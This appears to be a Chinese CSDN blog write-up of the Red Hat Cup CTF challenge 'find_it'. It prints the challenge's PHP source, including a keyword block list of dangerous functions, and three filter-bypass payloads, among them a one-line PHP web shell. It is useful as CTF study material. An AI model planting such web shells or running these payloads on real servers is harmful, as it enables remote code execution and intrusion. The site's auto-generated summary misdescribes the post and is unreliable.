红帽杯find_it

最新推荐文章于 2022-11-15 11:29:50 发布
最新推荐文章于 2022-11-15 11:29:50 发布
阅读量260 收藏
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53755216/article/details/116804160
版权
本文探讨了PHP基础语法和一个常见的安全问题——代码注入,展示了如何利用<?php ... ?>和文件操作,同时强调了防止恶意输入的重要性。通过实例,读者将理解如何避免mysql_connect漏洞并使用正则表达式检查用户输入。
摘要由CSDN通过智能技术生成

随便坐一坐

<?php $link = mysql_connect('localhost', 'ctfhub', 'ctfhub'); ?>
<html>
<head>
        <title>Hello worldd!</title>
        <style>
        body {
                background-color: white;
                text-align: center;
                padding: 50px;
                font-family: "Open Sans","Helvetica Neue",Helvetica,Arial,sans-serif;
        }

        #logo {
                margin-bottom: 40px;
        }
        </style>
</head>
<body>
        <img id="logo" src="logo.png" />
        <h1><?php echo "Hello My freind!"; ?></h1>
        <?php if($link) { ?>
                <h2>I Can't view my php files?!</h2>
        <?php } else { ?>
                <h2>MySQL Server version: <?php echo mysql_get_server_info(); ?></h2>
        <?php } ?>
</body>
</html>
<?php

#Really easy...

$file=fopen("flag.php","r") or die("Unable 2 open!");

$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));


$hack=fopen("hack.php","w") or die("Unable 2 open");

$a=$_GET['code'];

if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
        die("you die");
}
if(strlen($a)>33){
        die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);

fclose($file);
fclose($hack);
?>

fopen() 函数打开文件或者 URL
fwrite — 写入文件(可安全用于二进制文件)
fread ( resource $handle , int $length ) : string 最多读length个

三种方法随便挑 感觉还是第一个最简单

$a = "<?= passthru('ls'); ?>";
$a = "<?= EVAL($_POST[cmd]); ?>"
$a = "<?= show_source(glob('./*')); ?>
b1ue0cean
关注
专栏目录
红帽杯wp红帽杯wp
05-06
红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp
第四届红帽杯网络安全大赛-线上赛Writeup1
08-03
第四届红帽杯安全赛-线上赛Writeup 第四届红帽杯安全赛 - 线上赛 Writeup 第四届红帽杯安全赛-线上赛Writeup 第四届红帽杯安全赛-
2021-第四届红帽杯网络安全大赛-Web-find_it
weixin_40872714的博客
03-26 2413
2021-第四届红帽杯网络安全大赛-Web-find_it 题目 先用目录扫描工具爆破一下目录,发现了robots.txt 访问后有了提示 1ndexx.php 直接访问不到,需要访问vim的保存的缓冲类型文件.swp,访问之后获取到源码。 http://challenge-aea15f209493c304.sandbox.ctfhub.com:10800/.1ndexx.php.swp 把关键代码粘贴出来看一下运行流程 打开flag.php读取文件内容 打开hack.php文件,获取co
[CTFHub] 2021-第四届红帽杯网络安全大赛-Web-find_it
Anton__1的博客
05-12 2915
[CTFHub] 2021-第四届红帽杯网络安全大赛-Web-find_it 看群里说CTFHub上复现了, 我来看看 本来想按照红帽杯的套路来试一下,发现phpinfo里莫得flag了 只能想想其他办法咯 <?php #Really easy... $file=fopen("flag.php","r") or die("Unable 2 open!"); $I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize(
红帽杯 find_it
m_de_g的博客
09-28 605
红帽杯 find_it 一、解题思路 1.使用dirsearch扫描目录,发现了robots.txt文件 2.直接进行访问,发现1ndexx.php 3.那我就顺着这个思路来进行访问,未果 4.根据题目find_it那就说明肯定是源代码泄露 常见的备份文件后缀名有 .git .svn .swp .~ .bak .bash_history 我将其放到御剑里面进行扫描 同样没找结果,这里有个很大的坑,就是1ndexx.php也是个隐藏文件,应该在前面的访问目录下加个点,进行访问 http://chall
红帽杯2021web Find_it
qq_52671379的博客
06-14 331
Find_it 打开题目链接并没有任何收获 然后想想有无备份文件 最后通过dirsearch.py扫描发现robots.txt 发现存在1ndexx.php,直接访问并没有什么信息。 同样的猜测是否存在备份文件 常见的备份文件后扩展名有 .git .svn .swp .~ .bak .bash_history .svn 最后查看.swp备份文件得到源码 <?php $link = mysql_connect('localhost', 'root'); ?> <html> <
2021红帽杯 find_it
LYJ20010728的博客
06-22 1063
2021红帽杯 find_it考点思路Payload 考点 备份文件、源码泄露 思路 题目提示我们 I Can't view my php files?!,猜测是备份文件,御剑扫一下发现存在 robots.txt 访问 1ndexx.php,发现并不存在;由于Linux平台下的存在 .xxxx.php.swp、.xxxx.php.swo、.xxxx.php等文件格式,尝试访问一下 .1ndexx.php.swp,存在源码泄露 发现过滤了一堆东西,感觉没得啥子可以利用的点了,由于可以写入文件,
2021-第四届红帽杯网络安全大赛-find_it | 先备份文件、然代码审计、后正则绕过
一醉一休的博客
09-24 943
小小记录一下
findit
weixin_52034946的博客
01-15 331
APK反编译 尝试直接搜处flag,没成功 一直点最后一个,打开文件夹findit文件夹,找线索 会在第3个文件里发现俩列16进制数 写脚本转换成字符型呗,第一个是 那就是第二个了 pvkq{m164675262033l4m49lnp7p9mnk28k75} 看着就很像,但它不是. 那就可能这经过了加密处理,猜是凯撒密码了,数了下,相差10个 flag{c164675262033b4c49bdf7f9cda28a75} ...
红帽子Red_Hat_Linux_9光盘启动安装过程图解
11-13
详细的介绍了光盘启动安装linux红帽9.0系统的步骤,有图有文字,非常适合初学者学习linux
红帽(Red_Hat_Linux_9.0)安装方法
09-12
红帽(Red_Hat_Linux_9.0) 安装方法
2018红帽杯线上预选赛MISC文件--NotOnlyWireshark_ed63b63425ec3ed09470d8715b208293.zip
05-03
2018红帽杯线上预选赛MISC文件()Not Only WiresharkNotOnlyWireshark_ed63b63425ec3ed09470d8715b208293.zip
CTFHUB find_it
qq_46266956的博客
04-24 3518
CTFHUB find_it dirsearch扫描 robots.txt When I was a child,I also like to read Robots.txt Here is what you want: 1ndexx.php 1ndexx.php无法访问; 扫缓存.1ndexx.php.swp [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tzCdf50K-1650768257307)(C:\Users\27969\AppData\Roaming\Ty
ctfhub find_it
m0_57954651的博客
11-15 945
变量a有过滤 有个逻辑漏洞flag.php的内容 如果被绕过的话就会写入到hack.php中 我们可以直接。这里有个很大的坑 就是1ndexx.php也是个隐藏文件 应该在前面的访问目录下加个点 进行访问。执行命令后 访问hack.php 得到flag。根据题目find_it 说明应该是源代码泄露。使用工具 dirseach 目录扫描一下。得到一个可用文件 访问试试看。告诉我们它的php文件不见了。找到了不见的php文件。网站文件泄露常用后缀。网站文件泄露常用名称。
wp篇 find_it复现
这周末在做梦的博客
05-18 498
wp篇简述了博主复现CTF以及记录wp的过程一,复现1复现文件概述2复现过程概述二,wirteup1探测2解题3playload 一,复现 1复现文件概述 需要源码的请评论私聊。下面就简单展示一下,复现成功后的文件目录。 2复现过程概述 直接粘贴源码,如果利用vim断网生成.swp文件再服务器中无法长久存在,故直接touch .1ndexx.php.swp。后编辑修改。 为了解决出现的网站编码的问题,再在网页伪静态中加入将.swp解析为php的规则,将本题目做了微调。 二,wirteup 1探测 首先发现如
红帽wp
qq_51425032的博客
05-12 445
红帽wp 前言:这次和队里师傅一起打了红帽,做了几道题,但可惜还是没进线下,只能说还是太菜 web1 find it 御剑直接扫目录 得到一些熟悉的的东西,但是好像只有君子协定有用,打开得到一串文本 When I was a child,I also like to read Robots.txt Here is what you want:1ndexx.php 但是1ndexx.php打不开,猜测是否有备份 /.1ndexx.php.swp,得到源码 <?php $link =.
红帽杯2021_web_部分
ScyLamb的博客
05-10 1331
find_it 首页没发现东西,尝试robots.txt 发现 1ndexx.php 但无法访问 1ndexx.php 尝试继续找信息泄露,最后找到 .1ndexx.php.swp <?php $link = mysql_connect('localhost', 'root'); ?> <html> <head> <title>Hello worldd!</title> <style> body { background-co
[2021红帽杯]Web writeup
Anton__1的博客
05-10 1777
find_it 老套路扫一下目录 貌似只有君子协定有用,打开看看 When I was a child,I also like to read Robots.txt Here is what you want:1ndexx.php 打开1ndexx.php 发现打不开, 尝试一下是否有备份 /.1ndexx.php.swp 发现了一串代码: <?php $link = mysql_connect('localhost', 'root'); ?> <html> <hea
工控流量分析题+wireshark学习
热门推荐
qq_53755216的博客
06-28 1万+
写在前面 暑假报名了工控比赛 所以要找些工控的题目来刷刷 正好比赛方提供的靶场有很多类似的题目 开始痛苦的学习过程。。。 Wireshark Capture filter <Protocol name> <Direction><Host(s)><Value><Logical operations><Expression> 如何看带 <Logical operations> 1.<Protocol name>&l
红帽iptables
最新发布
08-18
红帽iptables(Red Hat's Internet Protocol Tracking and Logging Engine),通常称为iptables,是一个Linux内核模块,用于实现包过滤和网络转发策略。它是基于Netfilter框架的一个工具,允许系统管理员控制进出...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值